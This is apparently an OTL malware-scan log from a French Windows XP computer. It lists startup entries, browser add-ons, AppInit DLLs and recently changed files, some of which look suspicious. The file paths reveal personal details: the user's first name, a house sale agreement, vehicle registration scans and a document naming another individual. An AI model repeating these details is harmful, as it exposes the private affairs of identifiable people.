O3 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\..\Toolbar\ShellBrowser: (Adobe PDF) - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll ()
O3 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\..\Toolbar\WebBrowser: (Adobe PDF) - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll ()
O4 - HKLM..\Run: [] File not found
O4 - HKLM..\Run: [avast5] File not found
O4 - HKLM..\Run: [AVP] C:\Program Files\Kaspersky Lab\Kaspersky PURE\avp.exe (Kaspersky Lab)
O4 - HKLM..\Run: [CheckUpdate] C:\WINDOWS\System32\fmaj5.exe ()
O4 - HKLM..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [iTunesHelper] C:\Program Files\iTunes2\iTunesHelper.exe (Apple Inc.)
O4 - HKLM..\Run: [Logitech Utility] C:\WINDOWS\LOGI_MWX.EXE (Logitech Inc.)
O4 - HKLM..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe (Logitech Inc.)
O4 - HKLM..\Run: [LVCOMSX] C:\WINDOWS\system32\LVCOMSX.EXE (Logitech Inc.)
O4 - HKLM..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe ()
O4 - HKLM..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe (Ahead Software Gmbh)
O4 - HKLM..\Run: [NWEReboot] File not found
O4 - HKLM..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [SoundMan] C:\WINDOWS\SOUNDMAN.EXE (Realtek Semiconductor Corp.)
O4 - HKLM..\Run: [SunJavaUpdateSched] C:\Program Files\Fichiers communs\Java\Java Update\jusched.exe (Sun Microsystems, Inc.)
O4 - HKLM..\Run: [zBrowser Launcher] C:\Program Files\Logitech\iTouch\iTouch.exe (Logitech Inc.)
O4 - HKLM..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe (Malwarebytes Corporation)
O4 - Startup: C:\Documents and Settings\All Users\Menu Démarrer\Programmes\Démarrage\Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe (Logitech, Inc.)
O4 - Startup: C:\Documents and Settings\Karim\Menu Démarrer\Programmes\Démarrage\ERUNT AutoBackup.lnk = C:\Program Files\ERUNT\AUTOBACK.EXE ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\WINDOWS\System32\GPhotos.scr (Google Inc.)
O8 - Extra context menu item: Ajouter à l'Anti-bannière - C:\Program Files\Kaspersky Lab\Kaspersky PURE\ie_banner_deny.htm ()
O9 - Extra Button: Mon Clavier &virtuel - {4248FE82-7FCB-46AC-B270-339F08212110} - C:\Program Files\Kaspersky Lab\Kaspersky PURE\klwtbbho.dll (Kaspersky Lab)
O9 - Extra Button: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - File not found
O9 - Extra 'Tools' menuitem : PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - File not found
O9 - Extra Button: Analyse des &liens - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files\Kaspersky Lab\Kaspersky PURE\klwtbbho.dll (Kaspersky Lab)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O15 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\..Trusted Domains: ([]msn in My Computer)
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://fpdownload.macromedia.com/get/sh ... tor/sw.cab (Shockwave ActiveX Control)
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://go.microsoft.com/fwlink/?linkid=39204 (Windows Genuine Advantage Validation Tool)
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} http://dlm.tools.akamai.com/dlmanager/v ... .2.4.1.cab (DLM Control)
O16 - DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.canalblog.com/sharedDocs/mis ... oader5.cab (Image Uploader Control)
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} http://messenger.zone.msn.com/FR-FR/a-U ... E_UNO1.cab (UnoCtrl Class)
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} http://download.bitdefender.com/resourc ... oscan8.cab (BDSCANONLINE Control)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinsta ... s-i586.cab (Java Plug-in 1.6.0_18)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.macromedia.com/get/fl ... rashim.cab (Reg Error: Key error.)
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} http://messenger.zone.msn.com/binary/Me ... b56907.cab (MessengerStatsClient Class)
O16 - DPF: {CAFEEFAC-0014-0001-0002-ABCDEFFEDCBA} http://java.sun.com/update/1.4.1/jinsta ... s-i586.cab (Java Plug-in 1.4.1_02)
O16 - DPF: {CAFEEFAC-0016-0000-0018-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinsta ... s-i586.cab (Java Plug-in 1.6.0_18)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinsta ... s-i586.cab (Java Plug-in 1.6.0_18)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://download.macromedia.com/pub/shoc ... wflash.cab (Shockwave Flash Object)
O16 - DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} https://mppv2flash3.valueactive.com/unibet/FlashAX.cab (FlashXControl Object)
O16 - DPF: {D96D2F74-0B74-47D2-964F-B67E9F69F1CD} http://asp.congnamul.com/AspActiveX/Con ... sp_V29.cab (CongnamulMap4Asp Control)
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab (Reg Error: Key error.)
O16 - DPF: {E77F23EB-E7AB-4502-8F37-247DBAF1A147} http://gfx2.hotmail.com/mail/w4/pr01/ph ... NPUpld.cab (Windows Live Hotmail Photo Upload Tool)
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} https://secure.logmein.com/activex/ractrl.cab?lmi=100 (Performance Viewer Activex Control)
O16 - DPF: {FFBB3F3B-0A5A-4106-BE53-DFE1E2340CB1} http://dlm.tools.akamai.com/dlmanager/v ... .2.1.6.cab (Contrôleur de DownloadManager)
O16 - DPF: Microsoft XML Parser for Java file://C:\WINDOWS\Java\classes\xmldso.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O18 - Protocol\Handler\http\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\http\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\https\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\https\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\ms-itss {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Fichiers communs\Microsoft Shared\Information Retrieval\MSITSS.DLL (Microsoft Corporation)
O18 - Protocol\Handler\mso-offdap {3D9F03FA-7A94-11D3-BE81-0050048385D1} - C:\Program Files\Fichiers communs\Microsoft Shared\Web Components\10\OWC10.DLL (Microsoft Corporation)
O18 - Protocol\Handler\mso-offdap11 {32505114-5902-49B2-880A-1F7738E5A384} - C:\Program Files\Fichiers communs\Microsoft Shared\Web Components\11\OWC11.DLL (Microsoft Corporation)
O18 - Protocol\Filter\text/xml {807553E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Fichiers communs\Microsoft Shared\OFFICE11\MSOXMLMF.DLL (Microsoft Corporation)
O20 - AppInit_DLLs: (sockspy.dll sockspy.dll sockspy.dll sockspy.dll sockspy.dll sockspy.dll sockspy.dll sockspy.dll) - File not found
O20 - AppInit_DLLs: (C:\PROGRA~1\KASPER~1\KASPER~1\kloehk.dll) - C:\Program Files\Kaspersky Lab\Kaspersky PURE\kloehk.dll (Kaspersky Lab)
O20 - AppInit_DLLs: (C:\PROGRA~1\KASPER~1\KASPER~1\mzvkbd3.dll) - C:\Program Files\Kaspersky Lab\Kaspersky PURE\mzvkbd3.dll (Kaspersky Lab)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - Winlogon\Notify\klogon: DllName - C:\WINDOWS\system32\klogon.dll - C:\WINDOWS\system32\klogon.dll (Kaspersky Lab)
O20 - Winlogon\Notify\LBTWlgn: DllName - c:\program files\fichiers communs\logishrd\bluetooth\LBTWlgn.dll - c:\Program Files\Fichiers communs\Logishrd\Bluetooth\LBTWLgn.dll (Logitech, Inc.)
O20 - Winlogon\Notify\WgaLogon: DllName - Reg Error: Value error. - Reg Error: Value error. File not found
O20 - Winlogon\Notify\WRNotifier: DllName - WRLogonNTF.dll - File not found
O24 - Desktop Components:0 (Ma page d'accueil) - About:Home
O24 - Desktop WallPaper: C:\Documents and Settings\Karim\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Karim\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2005/07/06 00:05:48 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O33 - MountPoints2\{392bca84-520f-11df-89d0-001167b8a506}\Shell - "" = AutoRun
O33 - MountPoints2\{392bca84-520f-11df-89d0-001167b8a506}\Shell\AutoRun\command - "" = "E:\WD SmartWare.exe" autoplay=true
O33 - MountPoints2\{392bca8b-520f-11df-89d0-001167b8a506}\Shell - "" = AutoRun
O33 - MountPoints2\{392bca8b-520f-11df-89d0-001167b8a506}\Shell\AutoRun\command - "" = "E:\WD SmartWare.exe" autoplay=true
O33 - MountPoints2\{7831a68a-f04a-11d9-bc84-94c83f134754}\Shell\Auto\command - "" = bittorrent.exe e
O33 - MountPoints2\{7831a68a-f04a-11d9-bc84-94c83f134754}\Shell\AutoRun\command - "" = C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL bittorrent.exe e
O33 - MountPoints2\{caa9985d-2c9b-11dc-8328-00301bb2e8e9}\Shell\AutoRun\command - "" = E:\InstallTomTomHOME.exe
O34 - HKLM BootExecute: (autocheck autochk *) - File not found
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*

NetSvcs: Ias - File not found
NetSvcs: Iprip - File not found
NetSvcs: NWCWorkstation - File not found
NetSvcs: Nwsapagent - File not found
NetSvcs: WmdmPmSp - File not found

========== Files/Folders - Created Within 30 Days ==========

[2011/05/11 13:18:21 | 000,000,000 | ---D | C] -- C:\WINDOWS\ERDNT
[2011/05/11 13:17:09 | 000,000,000 | ---D | C] -- C:\Program Files\ERUNT
[2011/05/11 13:17:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Démarrer\Programmes\ERUNT
[2011/05/11 13:15:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Karim\Application Data\Malwarebytes
[2011/05/11 13:15:02 | 000,038,224 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2011/05/11 13:15:02 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Malwarebytes
[2011/05/11 13:14:58 | 000,020,952 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2011/05/11 13:14:58 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[2011/05/11 13:13:20 | 000,791,393 | ---- | C] (Lars Hederer ) -- C:\Documents and Settings\Karim\Bureau\erunt-setup.exe
[2011/05/11 13:13:02 | 007,734,208 | ---- | C] (Malwarebytes Corporation ) -- C:\Documents and Settings\Karim\Bureau\mbam-setup-1.50.1.1100.exe
[2011/05/11 13:12:13 | 000,580,608 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\Karim\Bureau\OTL.exe
[2011/05/11 09:40:30 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Démarrer\Programmes\WinSCP
[2011/05/11 09:40:29 | 000,000,000 | ---D | C] -- C:\Program Files\WinSCP
[2011/04/12 12:05:49 | 000,039,352 | ---- | C] (Infowatch) -- C:\WINDOWS\System32\drivers\CSVirtualDiskDrv.sys
[2011/04/12 12:05:48 | 000,088,632 | ---- | C] (Infowatch) -- C:\WINDOWS\System32\drivers\CSCrySec.sys
[2011/04/12 12:03:55 | 000,000,000 | ---D | C] -- C:\Program Files\Fichiers communs\InfoWatch
[2011/04/12 12:03:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Démarrer\Programmes\Kaspersky PURE
[2011/04/12 12:03:38 | 000,000,000 | ---D | C] -- C:\Program Files\Kaspersky Lab
[2011/04/12 12:03:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab
[2011/04/12 12:02:49 | 000,315,408 | ---- | C] (Kaspersky Lab) -- C:\WINDOWS\System32\drivers\klif.sys
[2011/04/12 11:46:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files
[2011/04/12 11:26:41 | 000,000,000 | ---D | C] -- C:\WINDOWS\BDOSCAN8
[6 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[11 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2011/05/11 13:17:21 | 000,000,767 | ---- | M] () -- C:\Documents and Settings\Karim\Menu Démarrer\Programmes\Démarrage\ERUNT AutoBackup.lnk
[2011/05/11 13:17:09 | 000,000,611 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\NTREGOPT.lnk
[2011/05/11 13:17:09 | 000,000,592 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\ERUNT.lnk
[2011/05/11 13:16:30 | 000,005,024 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\erunt-loc_fr.zip
[2011/05/11 13:15:02 | 000,000,784 | ---- | M] () -- C:\Documents and Settings\All Users\Bureau\Malwarebytes' Anti-Malware.lnk
[2011/05/11 13:13:20 | 000,791,393 | ---- | M] (Lars Hederer ) -- C:\Documents and Settings\Karim\Bureau\erunt-setup.exe
[2011/05/11 13:13:09 | 007,734,208 | ---- | M] (Malwarebytes Corporation ) -- C:\Documents and Settings\Karim\Bureau\mbam-setup-1.50.1.1100.exe
[2011/05/11 13:12:23 | 000,000,395 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\scan.zip
[2011/05/11 13:12:16 | 000,580,608 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Karim\Bureau\OTL.exe
[2011/05/11 13:10:29 | 000,000,026 | ---- | M] () -- C:\WINDOWS\System32\laststart
[2011/05/11 13:09:37 | 000,000,051 | ---- | M] () -- C:\WINDOWS\iTouch.ini
[2011/05/11 13:09:19 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2011/05/11 10:04:41 | 000,000,600 | ---- | M] () -- C:\Documents and Settings\Karim\Application Data\winscp.rnd
[2011/05/11 10:03:01 | 000,001,148 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1220945662-746137067-839522115-1003UA.job
[2011/05/11 09:40:31 | 000,001,464 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\WinSCP.lnk
[2011/05/11 09:05:55 | 000,002,284 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\Google Chrome.lnk
[2011/05/11 09:03:06 | 000,001,096 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1220945662-746137067-839522115-1003Core.job
[2011/05/11 08:37:12 | 000,002,206 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2011/05/09 19:11:26 | 000,007,316 | ---- | M] () -- C:\Documents and Settings\Karim\intlname.ols
[2011/05/09 10:10:40 | 000,000,632 | ---- | M] () -- C:\HomeBankProxy.ini
[2011/05/06 16:00:20 | 000,262,518 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\facture ACM acquittée.pdf
[2011/05/06 15:59:24 | 000,257,916 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\facture ACM acquittée.jpg
[2011/04/29 15:57:45 | 001,046,581 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\Nouvelle carte grise Laguna.pdf
[2011/04/29 15:54:43 | 000,479,699 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\new carte grise laguna 001.jpg
[2011/04/29 15:53:53 | 000,558,165 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\new carte grise laguna.jpg
[2011/04/26 10:33:14 | 000,000,792 | ---- | M] () -- C:\Documents and Settings\Karim\Application Data\Microsoft\Internet Explorer\Quick Launch\Démarrer Microsoft Office Outlook.lnk
[2011/04/26 10:33:11 | 000,513,094 | ---- | M] () -- C:\WINDOWS\System32\perfh00C.dat
[2011/04/26 10:33:11 | 000,444,054 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2011/04/26 10:33:11 | 000,086,300 | ---- | M] () -- C:\WINDOWS\System32\perfc00C.dat
[2011/04/26 10:33:11 | 000,072,312 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2011/04/26 10:23:58 | 001,701,776 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2011/04/18 10:24:57 | 000,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[2011/04/18 10:06:01 | 000,437,688 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\DAT De Wint Stéphanie.pdf
[2011/04/13 17:30:19 | 002,509,150 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\compromis vente maison.pdf
[2011/04/13 17:26:57 | 000,324,615 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\attestation tva acmobility.jpg
[2011/04/12 16:34:48 | 000,002,623 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\Microsoft Office Outlook 2003.lnk
[2011/04/12 15:27:08 | 000,002,341 | ---- | M] () -- C:\Documents and Settings\All Users\Bureau\iTunes.lnk
[2011/04/12 12:15:21 | 000,115,267 | ---- | M] () -- C:\WINDOWS\System32\drivers\klin.dat
[2011/04/12 12:15:21 | 000,097,859 | ---- | M] () -- C:\WINDOWS\System32\drivers\klick.dat
[2011/04/12 12:02:49 | 000,315,408 | ---- | M] (Kaspersky Lab) -- C:\WINDOWS\System32\drivers\klif.sys
[2011/04/12 11:53:52 | 000,003,072 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[6 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[11 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

========== Files Created - No Company Name ==========

[2011/05/11 13:17:21 | 000,000,767 | ---- | C] () -- C:\Documents and Settings\Karim\Menu Démarrer\Programmes\Démarrage\ERUNT AutoBackup.lnk
[2011/05/11 13:17:09 | 000,000,611 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\NTREGOPT.lnk
[2011/05/11 13:17:09 | 000,000,592 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\ERUNT.lnk
[2011/05/11 13:16:30 | 000,005,024 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\erunt-loc_fr.zip
[2011/05/11 13:15:02 | 000,000,784 | ---- | C] () -- C:\Documents and Settings\All Users\Bureau\Malwarebytes' Anti-Malware.lnk
[2011/05/11 13:12:23 | 000,000,395 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\scan.zip
[2011/05/11 09:40:31 | 000,001,464 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\WinSCP.lnk
[2011/05/06 16:00:19 | 000,262,518 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\facture ACM acquittée.pdf
[2011/05/06 15:58:17 | 000,257,916 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\facture ACM acquittée.jpg
[2011/04/29 15:57:43 | 001,046,581 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\Nouvelle carte grise Laguna.pdf
[2011/04/29 15:54:24 | 000,479,699 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\new carte grise laguna 001.jpg
[2011/04/29 15:52:46 | 000,558,165 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\new carte grise laguna.jpg
[2011/04/18 10:06:01 | 000,437,688 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\DAT De Wint Stéphanie.pdf
[2011/04/13 17:30:18 | 002,509,150 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\compromis vente maison.pdf
[2011/04/13 17:26:20 | 000,324,615 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\attestation tva acmobility.jpg
[2011/04/12 16:34:46 | 000,002,623 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\Microsoft Office Outlook 2003.lnk
[2011/04/12 12:06:43 | 000,115,267 | ---- | C] () -- C:\WINDOWS\System32\drivers\klin.dat
[2011/04/12 12:06:43 | 000,097,859 | ---- | C] () -- C:\WINDOWS\System32\drivers\klick.dat
[2011/03/24 19:05:16 | 000,254,576 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\FontCache3.0.0.0.dat
[2011/02/14 16:49:13 | 000,000,600 | ---- | C] () -- C:\Documents and Settings\Karim\Application Data\winscp.rnd
[2011/02/02 18:53:50 | 000,000,022 | ---- | C] () -- C:\WINDOWS\System32\winStudio.bin
[2010/08/16 20:19:21 | 000,000,050 | ---- | C] () -- C:\WINDOWS\MegaManager.INI
[2010/04/04 10:21:01 | 000,000,012 | ---- | C] () -- C:\Documents and Settings\LocalService\Application Data\jasltw.dat
[2010/04/02 18:28:58 | 000,000,012 | ---- | C] () -- C:\Documents and Settings\NetworkService\Application Data\jasltw.dat
[2010/04/02 18:28:52 | 000,000,004 | ---- | C] () -- C:\Documents and Settings\Karim\Application Data\avdrn.dat
[2010/03/24 16:08:29 | 000,165,376 | ---- | C] () -- C:\WINDOWS\System32\unrar.dll
[2010/02/01 17:16:32 | 000,000,754 | ---- | C] () -- C:\WINDOWS\WORDPAD.INI
[2010/01/25 12:58:06 | 000,462,848 | ---- | C] () -- C:\WINDOWS\System32\ractrlkeyhook.dll
[2009/11/22 18:25:35 | 000,392,192 | ---- | C] () -- C:\WINDOWS\System32\fmaj5.exe
[2009/10/28 14:29:40 | 000,000,940 | ---- | C] () -- C:\WINDOWS\bdoscandellang.ini
[2009/09/17 18:39:31 | 000,719,313 | ---- | C] () -- C:\WINDOWS\System32\unins000.exe
[2009/09/17 18:39:31 | 000,032,339 | ---- | C] () -- C:\WINDOWS\System32\unins000.dat
[2009/09/09 19:01:40 | 000,027,675 | ---- | C] () -- C:\WINDOWS\System32\drivers\klopp.dat
[2009/04/15 21:36:53 | 000,038,446 | ---- | C] () -- C:\Documents and Settings\Karim\Application Data\Microsoft Excel.ADR
[2009/03/16 18:28:57 | 000,066,048 | ---- | C] () -- C:\WINDOWS\System32\cygz.dll
[2009/03/01 11:37:52 | 000,083,164 | -H-- | C] () -- C:\WINDOWS\System32\mlfcache.dat
[2009/01/05 14:44:10 | 000,053,248 | ---- | C] () -- C:\WINDOWS\bdoscandel.exe
[2008/10/01 12:37:45 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\567d76cd.sys
[2008/08/22 17:51:47 | 000,000,256 | ---- | C] () -- C:\WINDOWS\System32\pool.bin
[2008/08/12 15:54:51 | 000,000,128 | ---- | C] () -- C:\Documents and Settings\Karim\Local Settings\Application Data\fusioncache.dat
[2008/08/12 15:35:23 | 000,000,314 | ---- | C] () -- C:\WINDOWS\hpbvspst.ini
[2008/08/12 15:35:08 | 000,001,145 | ---- | C] () -- C:\WINDOWS\hpbvnstp.ini
[2008/08/12 15:34:37 | 000,208,896 | ---- | C] () -- C:\WINDOWS\System32\HPP2800V.DLL
[2008/08/12 15:34:37 | 000,000,484 | ---- | C] () -- C:\WINDOWS\System32\HPP2800V.DAT
[2008/07/27 13:38:03 | 000,021,896 | ---- | C] () -- C:\Documents and Settings\Karim\Application Data\Valeurs séparées par des virgules (Windows).ADR
[2008/04/16 19:47:54 | 000,042,483 | ---- | C] () -- C:\WINDOWS\Icccodes.dat
[2008/02/20 17:33:51 | 000,010,240 | ---- | C] () -- C:\WINDOWS\System32\vidx16.dll
[2008/01/03 19:44:55 | 000,016,384 | ---- | C] () -- C:\WINDOWS\System32\FileOps.exe
[2007/06/08 21:39:17 | 000,000,664 | ---- | C] () -- C:\WINDOWS\System32\d3d9caps.dat
[2007/04/08 20:31:18 | 000,000,141 | ---- | C] () -- C:\WINDOWS\disney.ini
[2007/04/08 20:31:10 | 000,000,184 | ---- | C] () -- C:\WINDOWS\disneysy.ini
[2007/02/15 21:58:06 | 000,069,632 | ---- | C] () -- C:\WINDOWS\System32\xmltok.dll
[2007/02/15 21:58:06 | 000,036,864 | ---- | C] () -- C:\WINDOWS\System32\xmlparse.dll
[2006/12/25 12:03:47 | 000,000,040 | ---- | C] () -- C:\WINDOWS\NAVIGMA.INI
[2006/11/23 16:19:42 | 000,000,335 | ---- | C] () -- C:\WINDOWS\mozregistry.dat
[2006/10/18 17:11:16 | 000,000,012 | -H-- | C] () -- C:\WINDOWS\canptr.dll
[2006/10/18 17:11:16 | 000,000,003 | -H-- | C] () -- C:\WINDOWS\Hntxbin.dll
[2006/08/22 20:51:08 | 000,004,212 | -H-- | C] () -- C:\WINDOWS\System32\zllictbl.dat
[2006/06/16 07:44:51 | 000,001,755 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\QTSBandwidthCache
[2006/06/07 06:50:15 | 000,000,335 | ---- | C] () -- C:\WINDOWS\nsreg.dat
[2006/06/07 06:49:08 | 000,009,181 | ---- | C] () -- C:\WINDOWS\mozver.dat
[2006/04/06 19:52:47 | 000,000,120 | ---- | C] () -- C:\WINDOWS\Winchat.ini
[2006/03/22 18:51:48 | 000,000,305 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\addr_file.html
[2005/12/05 21:38:43 | 000,015,360 | ---- | C] () -- C:\WINDOWS\System32\BASSMOD.dll
[2005/11/26 18:29:42 | 000,089,088 | ---- | C] () -- C:\WINDOWS\System32\hpgt33.dll
[2005/08/09 22:00:14 | 000,000,339 | ---- | C] () -- C:\WINDOWS\PowerReg.dat
[2005/07/10 17:47:05 | 000,240,128 | ---- | C] () -- C:\Documents and Settings\Karim\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2005/07/08 21:11:11 | 000,053,248 | R--- | C] () -- C:\WINDOWS\System32\InstMed.exe
[2005/07/08 21:11:07 | 000,006,812 | ---- | C] () -- C:\WINDOWS\System32\lvcoinst.ini
